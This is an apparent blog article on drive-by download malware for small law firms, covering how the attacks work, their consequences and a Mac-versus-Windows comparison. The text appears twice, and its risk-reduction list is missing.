When people think about malware, they often imagine someone clicking a suspicious attachment or downloading a shady file. In reality, one of the most dangerous forms of infection requires no obvious mistake at all. It’s called a drive-by download, and it remains a quiet but serious threat.

The Threat

A drive-by download occurs when malicious code is installed on a device simply by visiting a compromised website—often without any prompt or warning. According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), these attacks exploit vulnerabilities in browsers, plugins, or operating systems to execute code automatically in the background.

This issue is tough even for top experts. Tom Mighell and Dennis Kennedy provided some suggestions in the Kennedy-Mighell Report (Part B, listener question) regarding unsubscribe links. Great ideas, but even their august minds could not come up with a way to have complete security.

What makes drive-by downloads particularly dangerous is how effectively they bypass human judgment. Even cautious users can be exposed. The site involved may be well known and legitimate, but compromised without the owner’s knowledge—a tactic documented repeatedly by security researchers.

The consequences range from irritating to severe. Drive-by infections may install spyware that captures credentials and browser sessions, or ransomware that encrypts entire systems. The FBI has warned that ransomware attacks increasingly begin with silent exploitation rather than user-initiated downloads (FBI ransomware guidance). In professional environments such as law firms or healthcare organizations, these infections can lead to data breaches, ethical violations, and regulatory exposure.

Attackers favor drive-by techniques because they scale efficiently. A single compromised website can infect thousands of visitors in hours. The National Institute of Standards and Technology (NIST) has identified “watering hole” and drive-by attacks as particularly difficult to detect precisely because victims often never realize how the infection occurred (NIST SP 800-53).

How to Reduce the Risk

No defense is perfect, but layered precautions significantly reduce exposure:

Mac OS vs. MS Windows?

Mac users sometimes believe they don’t need to worry as much about such threats. There is something to this, but the issue is more complicated than commonly believed. Kaspersky has a good summary of the relevant considerations.

Windows OS can be very safe — if it is set up and monitored by skilled IT pros. Most small and solo law firms don’t have this, so my sense is that macOS tends to be safer for them by reducing user choices. Windows reduces risk by enabling control—but only if exercised by skilled IT pros.

Summary

Drive-by downloads are dangerous not because users are careless, but because the attacks are engineered to exploit trust and invisibility. Awareness, combined with basic digital hygiene, remains the most reliable defense.

When people think about malware, they often imagine someone clicking a suspicious attachment or downloading a shady file. In reality, one of the most dangerous forms of infection requires no obvious mistake at all. It’s called a drive-by download, and it remains a quiet but serious threat.

A drive-by download occurs when malicious code is installed on a device simply by visiting a compromised website—often without any prompt or warning. According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), these attacks exploit vulnerabilities in browsers, plugins, or operating systems to execute code automatically in the background.

This issue is tough even for top experts. Tom Mighell and Dennis Kennedy provided some suggestions in the Kennedy-Mighell Report (Part B, listener question), specifically regarding unsubscribe links. Great ideas, but even their august minds could not come up with a way to have complete security.

What makes drive-by downloads particularly dangerous is how effectively they bypass human judgment. Even cautious users can be exposed. The site involved may be well known and legitimate, but compromised without the owner’s knowledge—a tactic documented repeatedly by security researchers.

The consequences range from irritating to severe. Drive-by infections may install spyware that captures credentials and browser sessions, or ransomware that encrypts entire systems. The FBI has warned that ransomware attacks increasingly begin with silent exploitation rather than user-initiated downloads (FBI ransomware guidance). In professional environments such as law firms or healthcare organizations, these infections can lead to data breaches, ethical violations, and regulatory exposure.

Attackers favor drive-by techniques because they scale efficiently. A single compromised website can infect thousands of visitors in hours. The National Institute of Standards and Technology (NIST) has identified “watering hole” and drive-by attacks as particularly difficult to detect precisely because victims often never realize how the infection occurred (NIST SP 800-53).

How to Reduce the Risk

No defense is perfect, but layered precautions significantly reduce exposure:

Mac OS vs. MS Windows?

Mac users sometimes believe they don’t need to worry as much about such threats. There is something to this, but the issue is more complicated than commonly believed. Kaspersky has a good summary of the relevant considerations.

Windows OS can be very safe — if it is set up and monitored by skilled IT pros. Most small and solo law firms don’t have this, so my sense is that macOS tends to be safer for them by reducing user choices. Windows reduces risk by enabling control—but only if exercised by skilled IT pros.

Summary

Drive-by downloads are dangerous not because users are careless, but because the attacks are engineered to exploit trust and invisibility. Awareness, combined with basic digital hygiene, remains the most reliable defense.